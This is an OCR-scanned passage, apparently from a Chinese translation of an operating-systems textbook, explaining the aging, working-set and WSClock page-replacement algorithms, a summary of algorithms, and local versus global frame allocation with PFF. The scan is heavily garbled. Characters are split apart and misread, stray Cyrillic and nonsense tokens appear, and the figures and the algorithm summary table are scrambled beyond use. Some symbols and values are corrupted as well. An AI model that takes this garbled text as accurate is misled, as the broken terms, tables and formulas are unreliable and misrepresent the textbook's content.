修改 以 后 的 算法 称 为 老化 (aging) 算法 ， 图 3-18 解 释 了 它 是 如 何 工 作 的 。 假 设 在 第 一 个 时 钟 滴答 
后 ， 页 面 0 到 页 面 5 的 R 位 值 分 别 是 1、0、1、0、1、1 (页 面 0 为 1， 页 面 1 为 0， 页 面 2 为 1， 以 此 类 推 ) 。 
换 名 话说， 在 时 钟 滴答 0 到 时 钟 滴答 1 期 间 ， 访 问 了 页 0、2、4、5， 它 们 的 R 位 设置 为 1， 而 其 他 页 面 的 R 
然 是 0。 对 应 的 6 个 计数 器 在 经 过 移 位 并 把 R 位 插入 其 左 端 后 的 值 如 图 3-18a 所 示 。 图 中 后 面 的 4 列 是 
在 下 4 个 时 钟 滴答 后 的 6 个 计数 器 的 值 。 


页 面 0-5 的 R 位 ， 页 面 0~5 的 R 位 ，; 页 面 0-5 的 R 位 。 页 面 0-5 的 R 位 ，} 页 面 0-5 的 R 位 ， 
时 钟 滴答 0 。 ;时 钟 滴答 1 时钟 滴答 2 ”; HRES ”; ”时钟 滴答 4 
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图 3-18 用 软件 模 所 LRU 的 老化 算法 。 图 中 所 示 是 6 个 页 面 在 5 个 时 钟 滴答 的 情况 ， 
5 个 时 钟 滴答 分 别 由 a~e 表 示 


发 生 缺 页 中 断 时 ， 将 置换 计数 器 值 最 小 的 页 面 。 如 果 一 个 页 面 在 前 面 4 个 时 钟 滴答 中 都 没有 访问 过 ， 
那么 它 的 计数 器 最 前 面 应 该 有 4 个 连续 的 0， 因 此 它 的 值 肯定 要 比 在 前 面 三 个 时 钟 滴答 中 都 没有 被 访问 过 
的 页 面 的 计数 器 值 小 。 

该 算法 与 LRU 有 两 个 区 别 。 如 图 3-18e 中 的 页 面 3 和 页 面 5， 它 们 都 连续 两 个 时 钟 滴答 没有 被 访问 过 
了 ， 而 在 两 个 时 钟 滴答 之 前 的 时 钟 滴答 中 它们 都 被 访问 过 。 根 据 LRU， 如 果 必 须 置 换 一 个 页 面 ， 则 应 访 
在 这 两 个 页 面 中 选择 一 个 。 然 而 现在 的 问题 是 ， 我 们 不 知道 在 时 钟 滴答 1 到 时 钟 滴答 2 期 间 它们 中 的 哪 一 
个 页 面 是 后 被 访问 到 的 。 因 为 在 每 个 时 钟 滴答 中 只 记录 了 一 位 ， 所 以 无 法 区 分 在 一 个 时 钟 滴答 中 哪个 页 
面 在 较 早 的 时 间 被 访问 以 及 哪个 页 面 在 较 晚 的 时 间 被 访问 ， 因 此 ， 我 们 所 能 做 的 就 是 置换 页 面 3， 原因 
是 页 面 5 在 更 往 前 的 两 个 时 钟 滴答 中 也 被 访问 过 而 页 面 3 没有 。 

LRU 和 老化 算法 的 第 二 个 区 别 是 老化 算法 的 计数 器 只 有 有 限 位 数 ( 本 例 中 是 8 位 )， 这 就 限制 了 其 对 
以 往 页 面 的 记录 。 如 果 两 个 页 面 的 计数 器 都 是 0， 我 们 只 能 在 两 个 页 面 中 随机 选 一 个 进行 置换 。 实际 上 ， 
有 可 能 其 中 一 个 页 面 上 次 被 访问 是 在 9 个 时 钟 滴答 以 前 ， 另 一 个 页 面 是 在 1000 个 时 钟 滴答 以 前 ， 而 我 们 
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却 无 法 看 到 这 些 。 在 实践 中 ， 如 果 时 钟 滴答 是 20ms，8 位 一 般 是 够 用 的 。 假 如 一 个 页 面 已 经 有 160ms 没 
有 被 访问 过 ， 那 么 它 很 可 能 并 不 重要 。 
3.4.8 工作 集 页 面 置换 算法 
在 单纯 的 分 页 系统 里 ， 刚 启动 进程 时 ， 在 内 存 中 并 没有 页 面 。 在 CPU 试 图 取 第 一 条 指令 时 就 会 产生 一 
次 缺 页 中 断 ， 使 操作 系统 装 人 含有 第 一 条 指令 的 页 面 。 其 他 由 访问 全 局 数据 和 堆栈 引起 的 缺 页 中 断 通常 会 
紧 接 着 发 生 。 一 段 时 间 以 后 ， 进 程 需要 的 大 部 分 页 面 都 已 经 在 内 存 了 ， 进程 开始 在 较 少 缺 页 中 断 的 情况 下 
运行 。 这 个 策略 称 为 请 求 调 页 (demand paging) ， 因 为 页 面 是 在 需要 时 被 调 入 的 ， 而 不 是 预先 装 入 。 
编写 一 个 测试 程序 很 容易 ， 在 一 个 大 的 地 址 空间 中 系统 地 读 所 有 的 页 面 ， 将 出 现 大 量 的 缺 页 中 断 ， 
因此 会 导致 没有 足够 的 内 存 来 容纳 这 些 页 面 。 不 过 幸运 的 是 ， 大 部 分 进程 不 是 这 样 工作 的 ， 它 们 都 表现 
出 了 一 种 局 部 性 访问 行为 ， 即 在 进程 运行 的 任何 阶段 ， 它 都 只 访问 较 少 的 一 部 分 页 面 。 例 如 ， 在 一 个 多 
次 扫描 编译 器 中 ， 各 次 扫描 时 只 访问 所 有 页 面 中 的 一 小 部 分 并 且 是 不 同 的 部 分 。 

-个 进程 当前 正在 使 用 的 页 面 的 集合 称 为 它 的 工作 集 (working set) (Denning, 1968a; Denning, 
1980) 。 如 果 整 个 工作 集 都 被 装 入 到 了 内 存 中 ， 那么 进程 在 运行 到 下 一 运行 阶段 (例如 ， 编 译 器 的 下 一 
RAR) 之 前 ， 不 会 产生 很 多 缺 页 中 断 。 车 内 存 太 小 而 无 法 容纳 下 整个 工作 集 ， 那么 进程 的 运行 过 程 中 
会 产生 大 量 的 缺 页 中 断 ， 导 致 运行 速度 也 会 变 得 很 缓慢 为 通常 只 需要 几 个 纳 秒 就 能 执行 完 一 条 指令 ， 
而 通常 需要 十 毫秒 才能 从 磁盘 上 读 入 一 个 页 面 。 如 果 一 个 程序 每 10ms 只 能 执行 一 到 两 条 指令 ， 那 么 它 将 
会 需要 很 长 时 间 才能 运行 完 。 若 每 执行 儿 条 指令 程序 就 发 生 一 次 缺 页 中 断 ， 那么 就 称 这 个 程序 发 生 了 站 
ЭА (thrashing) (Denning, 1968b), 

在 多 道 程序 设计 系统 中 ， 经 常会 把 进程 转移 到 磁盘 上 ( 即 从 内 存 中 移 走 所 有 的 页 面 )， 这 样 可 以 让 
其 他 的 进程 有 机 会 占有 CPU。 有 一 个 问题 是 ， 当 该 进程 再 次 调 回来 以 后 应 该 怎样 办 ? 从 技术 的 角度 上 讲 ， 
并 不 需要 做 什么 。 该 进程 会 一 直 产 生 缺 页 中 断 直到 它 的 工作 集 全 部 被 装 入 内 存 。 然而 ， 每 次 装 入 一 个 进 
程 时 都 要 产生 20、100 其 至 1000 次 缺 页 中 断 ， 速 度 显然 太 惕 了， 并 且 由 于 CPU 需 要 几 毫 秒 时 间 处 理 一 个 
缺 页 中 断 ， 因 此 有 相当 多 的 CPU 时 间 也 被 浪费 了 。 

所 以 不 少 分 页 系统 都 会 设法 跟踪 进程 的 工作 集 ， 以 确保 在 让 进程 运行 以 前 ， 它 的 工作 集 就 已 在 内 存 
中 了 。 该 方法 称 为 工作 全 模型 (working set model) (Denning，1970)， 其 目的 在 于 大 大 减少 缺 页 中 断 率 。 
在 让 进程 运行 前 预先 装 入 其 工作 集 页 面 也 称 为 预先 调 页 (prepaging)。 请 注意 工作 集 是 随 着 时 间 变 化 的 。 

人 们 很 早 就 发 现 大 多 数 程序 都 不 是 均匀 地 访问 它们 的 地 址 空间 的 ， 而 访问 往往 是 集中 于 一 小 部 分 页 
面 。 一 次 内 存 访问 可 能 会 取出 一 条 指令 ， 也 可 能 会 取 数据 ， 或 者 是 存储 数据 。 在 任 一 时 刻 !， 都 存在 一 
个 集合 ， 它 包含 所 有 最 近 k 次 内 存 访问 所 访问 过 的 页 面 。 这 个 集合 w(k, ) 就 是 工作 集 。 因 为 最 近 k= 1 次 访 
问 肯 定 会 访问 最 近 k>1 次 访问 所 访问 过 的 页 面 ， 
所 以 w(k, 0 是 k 的 单调 非 递减 函数 。 随 着 的 变 大 ， 
W 0 是 不 会 无 限 变 大 的 ， 因 为 程序 不 可 能 访问 比 
它 的 地 址 空间 所 能 容纳 的 页 面 数目 上 限 还 多 的 页 
面 ， 并 且 几 乎 没有 程序 会 使 用 每 个 页 面 。 图 3-19 
描述 了 作为 k 的 函数 的 工作 集 的 大 小 。 

事实 上 大 多 数 程序 会 任意 访问 一 小 部 分 页 
面 ， 但 是 这 个 集合 会 随 着 时 间 而 缓慢 变化 ， 这 个 。 图 3-19 工作 集 是 最 近 k 次 内 存 访问 所 访问 过 的 页 面 
事实 也 解释 了 为 什么 一 开始 曲线 快速 地 上 升 而 k 较 的 集合 ， 函 数 w(k, 0) 是 在 时 刻 时 工作 集 的 大 小 
大 时 上 升 会 变 慢 。 举 例 来 说 ， 某 个 程序 执行 占用 
了 两 个 页 面 的 循环 ， 并 使 用 四 个 页 面 上 的 数据 ， 那 么 可 能 每 执行 1000 条 指令 ， 它 就 会 访问 这 六 个 页 面 一 
次 ， 但 是 最 近 的 对 其 他 页 面 的 访问 可 能 是 在 100 万 条 指令 以 前 的 初始 化 阶段 。 因为 这 是 个 渐进 的 过 程 ，k 
值 的 选择 对 工作 集 的 内 容 影 响 不 大 。 换 句 话说 ， 《的 值 有 一 个 很 大 的 范围 它 处 在 这 个 范围 中 时 工作 集 
不 会 变 。 因 为 工作 集 随时 间 变化 很 慢 ， 那么 当 程序 重新 开始 时 ， 就 有 可 能 根据 它 上 次 结束 时 的 工作 集 对 
要 用 到 的 页 面 做 一 个 合理 的 推测 ， 预先 调 页 就 是 在 程序 继续 运行 之 前 预先 装 入 推测 出 的 工作 集 的 页 面 。 

为 了 实现 工作 集 模型 ， 操作 系统 必须 跟踪 哪些 页 面 在 工作 集中 。 通过 这 些 信息 可 以 直接 推导 出 一 个 
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合理 的 页 面 置 换算 法 : 当 发 生 缺 页 中 断 时 ， 淘 汰 一 个 不 在 工作 集中 的 页 面 。 为 了 实现 该 算法 ， 就 需要 
种 精确 的 方法 来 确定 哪些 页 面 在 工作 集中 。 根 据 定义 ， 工作 集 就 是 最 近 k 次 内 存 访问 所 使 用 过 的 页 面 的 集 
合 (有 些 设计 者 使 用 最 近 k 次 页 面 访问 ,但 是 选择 是 任意 的 )。 为 了 实现 工作 集 算法 ， 必须 预先 选 定 k 的 值 。 
“ 量 选 定 某 个 值 ， 每 次 内 存 访问 之 后 ， 最 近 k 次 内 存 访问 所 使 用 过 的 页 面 的 集合 就 是 惟一 确定 的 Т. 

当然 ,有 了 工作 集 的 定义 并 不 意味 着 存在 一 种 有 效 的 方法 能 够 在 程序 运行 期 间 及 时 地 计算 出 工作 集 。 
设想 有 一 个 长 度 为 /的 移 位 寄存 器 ， 每 进行 一 次 内 存 访问 就 把 寄存 器 左 移 一 位 ， 然后 在 最 右 端 插入 刚才 
所 访问 过 的 页 面 号 。 移 位 寄存 器 中 的 k 个 页 面 号 的 集合 就 是 工作 集 。 理 论 上 ， 当 缺 页 中 断 发 生 时 ， 只 要 
读 出 移 位 寄存 器 中 的 内 容 并 排序 ， 然 后 删除 重复 的 页 面 。 结 果 就 是 工作 集 。 然 而 ， 维护 移 位 寄存 器 并 在 
缺 页 中 断 时 处 理 它 所 需 的 开销 很 大 ， 因 此 该 技术 从 来 没有 被 使 用 过 。 

作为 替代 ， 可 以 使 用 几 种 近似 的 方法 。 一 种 常见 的 近似 方法 就 是 ， 不 是 向 后 找 最 近 k 次 的 内 存 访问 ， 
而 是 考虑 其 执行 时 间 。 例 如 ， 按 照 以 前 的 方法 ， 我 们 定义 工作 集 为 前 1000 万 次 内 存 访问 所 使 用 过 的 页 面 
的 集合 ， 那 么 现在 就 可 以 这 样 定义 : 工作 集 即 是 过 去 10ms 中 的 内 存 访问 所 用 到 的 页 面 的 集合 。 实 际 上 ， 
这 样 的 模型 很 合适 且 更 容易 实现 。 要 注意 到 ， 每 个 进程 只 计算 它 自己 的 执行 时 间 。 因此 ， 如 果 一 个 进程 
在 7 时 刻 开始 ， 在 (T+100) ms 的 时 刻 使 用 了 40ms CPU 时 间 ， 对 工作 集 而 言 它 的 时 间 就 是 40ms。 一 个 
进程 从 它 开 始 执行 到 当前 所 实际 使 用 的 CPU 时 间 总 数 通常 称 作 当 前 实际 了 时 间 。 通过 这 个 近似 的 方法 ， 
进程 的 工作 集 可 以 被 称 为 在 过 去 的 r 秒 实际 运行 时 间 中 它 所 访问 过 的 页 面 的 集合 。 

现在 让 我 们 来 看 一 下 基于 工作 集 的 页 面 置 换算 法 。 基本 思路 就 是 找 出 一 个 不 在 工作 集中 的 页 面 并 淘 
汰 它 。 在 图 3-20 中 读者 可 以 看 到 某 台 机 器 的 部 分 页 表 。 因为 只 有 那些 在 内 存 中 的 页 面 才 可 以 作为 候选 者 
被 淘汰 ， 所 以 该 算法 忽略 了 那些 不 在 内 存 中 的 页 面 。 每 个 表 项 至 少 包含 两 条 信息 ， 上 次 使 用 该 页 面 的 近 
似 时 间 和 R (访问 ) 位 。 空 白 的 矩形 表示 该 算法 不 需要 的 其 他 域 ， 如 页 框 号 、 保护 位 、M (修改 ) 位 。 
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па 
图 3-20 工作 集 算法 


该 算法 工作 方式 如 下 。 如 前 所 述 ， 假 定 使 用 硬件 来 置 R 位 和 M 位 。 同样 ， 假 定 在 每 个 时 钟 滴 答 中 ， 
有 一 个 定期 的 时 钟 中 断 会 用 软件 方法 来 清除 R 位 。 每 当 缺 页 中 断 发 生 时 ， 扫描 页 表 以 找 出 一 个 合适 的 页 
面 淘汰 之 。 

在 处 理 每 个 表 项 时 ， 都 需要 检查 R 位 。 如 果 它 是 1， 就 把 当前 实际 时 间 写 进 页 表 项 的 “上 次 使 用 时 
间 ” 域 ， 以 表示 缺 页 中 断 发 生 时 该 页 面 正 在 被 使 用 。 既然 该 页 面 在 当前 时 钟 滴答 中 已 经 被 访问 过 ， 那 么 
很 明显 它 应 该 出 现在 工作 集中 ， 并 且 不 应 该 被 删除 (假定 r 横 跨 多 个 时 钟 滴答 ) 。 

如 果 R 是 0， 那 么 表示 在 当前 时 钟 滴答 中 ， 该 页 面 还 没有 被 访问 过 ， 则 它 就 可 以 作为 候选 者 被 置换 。 
为 了 知道 它 是 否 应 该 被 置换 ， 需 要 计算 它 的 生存 时 间 ( 即 当前 实际 运行 时 间 减 去 上 次 使 用 时 间 )， 然 后 
与 做 比较 。 如 果 它 的 生存 时 间 大 于 Tt， 那么 这 个 页 面 就 不 再 在 工作 集中 ， 而 用 新 的 页 面 置换 它 。 扫 描 会 
继续 进行 以 更 新 剩余 的 表 项 。 
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然而 ， 如 果 R 是 0 同时 生存 时 间 小 于 或 等 于 r， 则 该 页 面 仍然 在 工作 集中 。 这 样 就 要 把 该 页 面临 时 保 
留 下 来 ， 但 是 要 记录 生存 时 间 最 长 (“上 次 使 用 时 间 ” 的 最 小 值 ) 的 页 面 。 如 果 扫 描 完整 个 页 表 却 没有 
找到 适合 被 淘汰 的 页 面 ， 也 就 意味 着 所 有 的 页 面 都 在 工作 集中 。 在 这 种 情况 下 ， 如 果 找 到 了 一 个 或 者 多 
个 R=0 的 页 面 ， 就 淘汰 生存 时 间 最 长 的 页 面 。 在 最 坏 情况 下 ， 在 当前 时 间 滴 答 中 ， 所 有 的 页 面 都 被 访问 
过 了 (也 就 是 都 有 R=1)， 因 此 就 随机 选择 一 个 页 面 淘汰 ， 如 果 有 的 话 最 好 选 一 个 干净 页 面 。 


3.4.9 工作 集 时钟 页 面 置换 算法 

当 缺 页 中 断 发 生 后 , 需要 扫描 整个 页 表 才 能 确定 被 淘汰 的 页 面 , 因此 基本 工作 集 算法 是 比较 费时 的 。 
有 一 种 改进 的 算法 ， 它 基于 时 钟 算法 ， 并 且 使 用 了 工作 集 信息 ， 称 为 WSClock (工作 集 时 钟 ) 算法 
(Carr 和 Hennessey，1981)。 由 于 它 实现 简单 ， 性 能 较 好 ， 所 以 在 实际 工作 中 得 到 了 广泛 应 用 。 

与 时 钟 算法 一 样 ， 所 需 的 数据 结构 是 一 个 以 页 框 为 元 素 的 循环 表 ， 参 见 图 3-21a。 最 初 ， 该 表 是 空 
的 。 当 装 入 第 一 个 页 面 后 ， 把 它 加 到 该 表 中 。 随 着 更 多 的 页 面 的 加 入 ， 它 们 形成 一 个 环 。 每 个 表 项 包含 
来 自 基本 工作 和 集 算法 的 上 次 使 用 时 间 ， 以 及 R 位 (已 标明 ) 和 M 位 (未 标明 )。 


当前 实际 时 间 


saopl {ЫП 


ова] AEAN ЕПП Бә 


Б N Fn | | 


Бех Бај зас ар) 
[тз] + “к HDA 
上 次 使 
а 用 时 间 b) 
rao {ҮТ 
zaar] Бә] Б [зә] 
езе | 
20031 | 区 可 РА 
E orafo Б 20+4]о] 
| 
ә d) 新 页 面 


图 3-21 工作 集 时 钟 页 面 置 换算 法 的 操作 : a) 和 b) 给 出 在 R=1 时 所 发 生 的 情形 ，c) 和 d) 给 出 R=0 的 例子 


与 时 钟 算法 一 样 ， 每 次 缺 页 中 断 时 ， 首 先 检查 指针 指向 的 页 面 。 如 果 R 位 被 置 为 1， 访 页面 在 当前 
时 钟 滴答 中 就 被 使 用 过 ， 那么 该 页 面 就 不 适合 被 淘汰 。 然 后 把 该 页 面 的 R 位 置 为 0, 指针 指向 下 一 个 页 面 ， 
并 重复 该 算法 。 该 事件 序列 之 后 的 状态 参见 图 3-21b。 

现在 来 考虑 指针 指向 的 页 面 在 R=0 时 会 发 生 什 么 ， 参 见 图 3-21c。 如 果 页 面 的 生存 时 间 大 于 Tt 并且 该 
页 面 是 干净 的 ， 它 就 不 在 工作 集中 ， 并 且 在 磁盘 上 有 一 个 有 效 的 副本 。 申 请 此 页 框 ， 并 把 新 页 面 放 在 其 
中 ， 如 图 3-21d 所 示 。 另 一 方面 ， 如 果 此 页 面 被 修改 过 ， 就 不 能 立即 申请 页 框 ， 因 为 这 个 页 面 在 磁盘 上 
没有 有 效 的 副本 。 为 了 避免 由 于 调度 写 磁盘 操作 引起 的 进程 切换 ， 指 针 继 续 向 前 走 ， 算 法 继续 对 下 一 个 
页 面 进行 操作 。 毕 竟 ， 有 可 能 存在 一 个 旧 的 且 干 净 的 页 面 可 以 立即 使 用 。 

原则 上 ， 所 有 的 页 面 都 有 可 能 因为 磁盘 IO 在 某 个 时 钟 周期 被 调度 。 为 了 降低 磁盘 阻塞 ， 需 要 设置 
一 个 限制 ， 即 最 大 只 允许 写 回 "个 页 面 。 一 旦 达到 该 限制 ， 就 不 允许 调度 新 的 写 操作 。 

如 果 指针 经 过 一 围 返回 它 的 起 始点 会 发 生 什么 呢 ? 这 里 有 两 种 情况 : 

D 至 少 调度 了 一 次 写 操作 。 
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2) 没有 调度 过 写 操作 。 

对 于 第 一 种 情况 ， 指 针 仅仅 是 不 停 地 移动 ， 寻 找 一 个 干净 页 面 。 既 然 已 经 调度 了 一 个 或 者 多 个 写 操 
作 ， 最 终 会 有 某 个 写 操作 完成 ， 它 的 页 面 会 被 标记 为 干净 。 置 换 遇 到 的 第 一 个 干净 页 面 ， 这 个 页 面 不 一 
定 是 第 一 个 被 调度 写 操 作 的 页 面 ， 因 为 硬盘 驱动 程序 为 了 优化 性 能 可 能 已 经 把 写 操作 重 排序 了 。 

对 于 第 二 种 情况 ， 所 有 的 页 面 都 在 工作 集中 ,否则 将 至 少 调度 了 一 个 写 操作 。 由 于 缺乏 额外 的 信息 ， 
一 个 简单 的 方法 就 是 随便 置换 一 个 干净 的 页 面 来 使 用 ， 扫 描 中 需要 记录 干净 页 面 的 位 置 。 如 果 不 存在 干 
净 页 面 ， 就 选 定 当前 页 面 并 把 它 写 回 磁盘 。 
3.4.10 页 面 置换 算法 小 结 

我 们 已 经 考察 了 多 种 页 面 置换 算法 ， 本 节 将 对 这 些 算法 进行 总 结 。 已 经 讨论 过 的 算法 在 图 3-22 中 列 出 。 

最 优 算法 在 当前 页 面 中 置换 最 后 要 访问 到 的 页 面 。 不 幸 的 是 ， 没 有 办 法 来 判定 哪个 页 面 是 最 后 一 个 
要 访问 的 ， 因 此 实际 上 该 算法 不 能 使 用 。 然 而 ， 它 可 以 作为 衡量 其 他 算法 的 基准 。 

NRU 算 法 根据 R 位 和 M 位 的 状态 把 页 面 分 为 四 类 。 从 编号 最 小 的 类 中 随机 选择 一 个 页 面 置换 。 该 算 
法 易于 实现 ， 但 是 性 能 不 是 很 好 ， 还 存在 更 好 的 算法 。 


# 法 注 R 
最 优 算法 不 可 实现 ， 但 可 用 作 基 淮 
NRU (最 近 未 使 用 ) 算法 LRU RASARE 
| но (先进 先 出 ) 算法 可 能 抛弃 重要 页 而 
| 第 三 次 机 会 算法 比 FIFO 有 大 的 改善 
时 钟 算法 | 现实 的 


LRU (最 近 最 少 使 用 ) 算法 | MAA, RERA 。 

| NEU (最 不 经 常 使 用 ) 算法 | LRU 的 相对 相 略 的 近似 
老化 算法 非常 近似 LRU 的 有 效 算法 

上 工作 集 算 法 22 

| 工作 集 时 钟 算法 

图 3-22 书 中 


FIFO 算 法 通过 维护 一 个 页 面 的 链表 来 记录 它们 装 入 内存 的 顺序 。 淘 汰 的 是 最 老 的 页 面 ， 但 是 该 页 
面 可 能 仍 在 使 用 ， 因 此 FIFO 算 法 不 是 一 个 好 的 选择 。 

第 二 次 机 会 算法 是 对 FIFO 算 法 的 改进 ， 它 在 移出 页 面前 先 检 查 该 页 面 是 否 正在 被 使 用 。 如 果 该 页 
面 正在 被 使 用 ， 就 保留 该 页 面 。 这 个 改进 大 大 提高 了 性 能 。 时 钟 算法 是 第 二 次 机 会 算法 的 另 一 种 实现 。 
它 具有 相同 的 性 能 特征 ， 而 且 只 需要 更 少 的 执行 时 间 。 

LRU 算 法 是 一 种 非常 优秀 的 算法 ， 但 是 只 能 通过 特定 的 硬件 来 实现 。 如 果 机 器 中 没有 该 硬件 ， 那 么 
也 无 法 使 用 该 算法 。NFU 是 一 种 近似 于 LRU 的 算法 ， 它 的 性 能 不 是 非常 好 ， 然 而 ， 老化 算法 更 近似 于 
LRU 并 且 可 以 更 有 效 地 实现 ， 是 一 个 很 好 的 选择 。 

最 后 两 种 算法 都 使 用 了 工作 集 。 工 作 集 算法 有 合理 的 性 能 ， 但 它 的 实现 开销 较 大 。 工 作 集 时 钟 算法 
是 它 的 一 种 变 体 ， 不 仅 具有 良好 的 性 能 ， 并 且 还 能 高 效 地 实现 。 

总 之 ， 最 好 的 两 种 算法 是 老化 算法 和 工作 集 时 钟 算法 ， 它 们 分 别 基于 LRU 和 工作 集 。 它 们 都 具有 良好 
的 页 面 调度 性 能 ， 可 以 有 效 地 实现 。 也 存在 其 他 一 些 算法 ， 但 在 实际 应 用 中 ， 这 两 种 算法 可 能 是 最 重要 的 。 


3.5 分 页 系统 中 的 设计 问题 

在 前 儿 节 里 我 们 讨论 了 分 页 系统 是 如 何 工作 的 ,并 给 出 了 一 些 基本 的 页 面 置 换算 法 和 如 何 实现 它们 。 
然而 只 了 解 基本 机 制 是 不 够 的 。 要 设计 一 个 系统 ， 必 须 了 解 得 更 多 才能 使 系统 工作 得 更 好 。 这 两 者 之 间 
的 差别 就 像 知道 了 怎样 移动 象棋 的 各 种 棋子 与 成 为 一 个 好 棋 手 之 间 的 差别 。 下 面 我 们 将 讨论 为 了 使 分 页 
系统 达到 较 好 的 性 能 ， 操 作 系统 设计 者 必须 仔细 考虑 的 一 些 其 他 问题 。 


3.5.1 局 部 分 配 策略 与 全 局 分 配 策略 
在 前 几 节 中 ， 我 们 讨论 了 在 发 生 缺 页 中 断 时 用 来 选择 一 个 被 置换 页 面 的 几 个 算法 。 与 这 个 选择 相关 
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的 一 个 主要 问题 (到 目前 为 止 我 们 一 直 在 小 心地 回避 这 个 问题 ) 是， 怎样 在 相互 竞争 的 可 运行 进程 之 间 
分 配 内 存 。 

如 图 3-23a 所 示 ， 三 个 进程 A、B、C 构 成 了 可 运行 进程 的 集合 。 假 如 A 发 生 了 缺 页 中 断 ， 页 面 兽 换 
算法 在 寻找 最 近 最 少 使 用 的 页 面 时 是 只 考虑 分 配给 A 的 6 个 页 面 呢 ? 还 是 考虑 所 有 在 内 存 中 的 页 面 ? 如 果 
只 考虑 分 配给 A 的 页 面 ， 生 存 时 间 值 最 小 的 页 面 是 A5， 于 是 将 得 到 图 3-23b 所 示 的 状态 。 


生存 时 间 

w jio A0 А0 
АТ ] 7 А! АТ 
A2 js А2 А2 
Аз j4 АЗ АЗ 
A4 je Аа Аа 
A5 | 3 85 А5 
во jo ВО 80 
B1 4 ЕП 4 Вт 
82 ]6 |в B2 
вз j2 B3 

B js Ва B4 
85—16 C| 85 
Be |12 Be B 
стз Ст Ст 
c js ca Сг 
сз je Сз Сз 
а) b) © 


图 3-23 局 部 页 面 置 换 与 全 局 页 面 置换 ，a) 最 初 配置 ，b) 局 部 页 面 置换 ，c) 全 局 页 面 置换 


另 一 方面 ， 如 果 淘 汰 内 存 中 生存 时 间 值 最 小 的 页 面 而 不 管 它 属于 哪个 进程 ， 则 将 选中 页 面 B3， 
于 是 将 得 到 图 3-23c 所 示 的 情况 。 图 3-23b 的 算法 被 称 为 局 部 (local) 页 面 置换 算法 ， 而 图 3-23c 被 称 为 全 
局 (global) 页 面 置换 算法 。 局 部 算法 可 以 有 效 地 为 每 个 进程 分 配 固定 的 内 存 片段 。 全 局 算法 在 可 运行 
进程 之 间 动态 地 分 配 页 框 ， 因此 分 配给 各 个 进程 的 页 框 数 是 随时 间 变 化 的 。 

全 局 算法 在 通常 情况 下 工作 得 比 局 部 算法 好 ， 当 工 作 集 的 大 小 随 进程 运行 时 间 发 生变 化 时 这 种 现象 
更 加 明显 。 若 使 用 局 部 算法 ， 即 使 有 大 量 的 空闲 页 框 存在 ， 工作 集 的 增长 也 会 导致 颠 篮 。 如 果 工 作 集 缩 
小 了 ， 局 部 算法 又 会 浪费 内 存 。 在 使 用 全 局 算法 时 ， 系统 必须 不 停 地 确定 应 该 给 每 个 进程 分 配 多 少 页 框 。 
一 种 方法 是 监测 工作 集 的 大 小 ， 工 作 集 大 小 由 “老化 ”位 指出 ， 但 这 个 方法 并 不 能 防止 颠 徐 。 因 为 工作 
集 的 大 小 可 能 在 几 微 秒 内 就 会 发 生 改变 ， 而 老化 位 却 要 经 历 一 定 的 时 钟 滴答 数 才 会 发 生变 化 。 

另 一 种 途径 是 使 用 一 个 为 进程 分 配 页 框 的 算法 。 其 中 一 种 方法 是 定期 确定 进程 运行 的 数目 并 为 它们 
分 配 相等 的 份额 。 例 如 ， 在 有 12 416 个 有 效 ( 即 未 被 操作 系统 使 用 的 ) 页 框 和 10 个 进程 时 ， 每 个 进程 将 
获得 1241 个 页 框 ， 剩 下 的 6 个 被 放 入 到 一 个 公用 池 中 ， 当 发 生 缺 页 中 断 时 可 以 使 用 这 些 页 面 。 

这 个 算法 看 起 来 好 像 很 公平 ， 但 是 给 一 个 10OKB 的 进程 和 一 个 300KB 的 进程 分 配 同样 大 小 的 内 存 块 
是 很 不 合理 的 。 可 以 采用 按照 进程 大 小 的 比例 来 为 它们 分 配 相应 数目 的 页 面 的 方法 来 取代 上 一 种 方法 ， 
这 样 300KB 的 进程 将 得 到 10KB 进 程 30 倍 的 份额 。 比较 明智 的 一 个 可 行 的 做 法 是 对 每 个 进程 都 规定 一 个 
最 小 的 页 框 数 ， 这 样 不 论 多 么 小 的 进程 都 可 以 运行 。 例 如 ， 在 某 些 机 器 上 ， 一 条 两 个 操作 数 的 指令 会 需 
要 多 达 6 个 页 面 ， 因 为 指令 自身 、 源 操作 数 和 目的 操作 数 可 能 会 跨越 页 面 边界 ， 车 只 给 一 条 这 样 的 指令 
分 配 了 5 个 页 面 ， 则 包含 这 样 的 指令 的 程序 根本 无 法 运行 。 

如 果 使 用 全 局 算法 ， 根 据 进程 的 大 小 按 比例 为 其 分 配 页 面 也 是 可 能 的 ， 但 是 该 分 配 必须 在 程序 运行 
时 动态 更 新 。 管 理 内 存 动态 分 配 的 一 种 方法 是 使 用 PFF (Page Fault Frequency, ЖЛ ФЮ Ж) 算法 。 它 
指出 了 何 时 增加 或 减少 分 配给 一 个 进程 的 页 面 ， 但 却 完全 没有 说 明 在 发 生 缺 页 中 断 时 应 该 替换 挤 哪 一 个 
页 面 ， 它 仅仅 控制 分 配 集 的 大 小 。 

正如 我 们 上 面 讨论 过 的 ， 有 一 大 类 页 面 置换 算法 (包括 LRU 在 内 ) ， 缺 页 中 断 率 都 会 随 着 分 配 的 页 
面 的 增加 而 降低 ， 这 是 PFF 背 后 的 假定 。 这 一 性 质 在 图 3-24 中 说 明 。 

测量 缺 页 中 上 断 率 的 方法 是 直截了当 的 ,计算 每 秒 的 缺 页 中 断 数 ， 可 能 也 会 将 过 去 数秒 的 情况 做 连续 
平均 。 一 个 简单 的 方法 是 将 当前 这 一 秒 的 值 加 到 当前 的 连续 平均 值 上 然后 除 以 2。 虚线 A 对 应 于 一 个 高 得 
不 可 接受 的 缺 页 中 断 率 ， 虚线 B 则 对 应 于 一 个 低 得 可 以 假设 进程 拥有 过 多 内 存 的 缺 页 中 断 率 。 在 这 种 情 
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况 下 ， 可 能 会 从 该 进程 的 资源 中 剥夺 部 分 页 框 。 这 样 ，PFF 尽 力 让 每 个 进程 的 缺 页 中 断 率 控制 在 可 接受 
的 范围 内 。 

值得 注意 的 是 ， 一 些 页 面 置换 算法 既 适用 于 局 部 
笑 换 算法 ， 又 适用 于 全 局 置换 算法 。 例 如 ，FIFO 能 
够 将 所 有 内 存 中 最 老 的 页 面 置换 掉 (全 局 算法 ) ， 也 
能 将 当前 进程 的 页 面 中 最 老 的 替换 掉 (局 部 算法 )。 
相似 地 ，LRU 或 是 一 些 类 似 算法 能 够 将 所 有 内 存 中 最 
近 最 少 访问 的 页 框 替换 掉 (全 局 算法 ) ， 或 是 将 当前 ЭЛДЕ 
进程 中 最 近 最 少 使 用 的 页 框 替换 掉 (局 部 算法 )。 在 
